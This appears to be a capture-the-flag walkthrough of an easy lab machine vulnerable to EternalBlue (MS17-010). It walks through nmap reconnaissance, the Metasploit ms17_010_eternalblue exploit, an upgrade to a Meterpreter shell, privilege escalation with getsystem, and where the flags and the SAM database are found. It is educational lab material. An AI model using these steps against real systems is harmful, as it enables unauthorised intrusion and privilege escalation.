This is a very easy box, based on eternal blue vulnerability(CVE-2017-0143). The first thing we're gonna do is a nmap scan to see which are the open ports and services running.
The flags used in the nmap scan are: -sS - for a syn scan -sV -for a service version scan -O - to identify the OS used -T4 - the speed of scan -open - to show only the open ports
We notice the service running on port 445 is SMB, so we can use a nmap script to verify if the service is vulnerable or not to eternalblue vulnerability.
The flags used are: -p - to test only the port provided(in our case 445) -script smb-vuln-ms17-010 - the nmap script to be run against our target port The output of the scan shows us the service is vulnerable to ms17-010.
MSFConsole already has this exploit, so let's fire it up. To search for the exploit, type in the console:
search eternalblueI'll be using windows/smb/ms17_010_eternalblue since we know from the initial NMAP scan that the target is running windows 7. Let's configure the exploit. Type the following commands:
use windows/smb/ms17_010_eternalblueYou cand type
show options/optionsthen to see the options available. Set the IP of the vulnerable machine with the command:
set RHOSTS IpOfTheMachineTo exploit the target just type exploit or run in the cmd. You should have an output similar to this:
Now, press enter and you'll be spawned an OS shell. You can get a flag from the Documents folder from the user Jon. To have more tools at our hands, we'll upgrade our os shell to a meterpreter shell. Background the session using CTRL+Z, and search for shell_to_meterpreter post module. Use the above mentioned module, and set the session to 1. Type exploit/run to upgrade from the os shell to a meterpreter shell. To get NT AUTHORITY\SYSTEM(privileged user/admin) we can use the meterpreter command
getsystemwhich will try to automatically escalate privileges for us. The other flags are in C:(flag1), and C:/Windows/System32/config where is the actual location of the SAM database.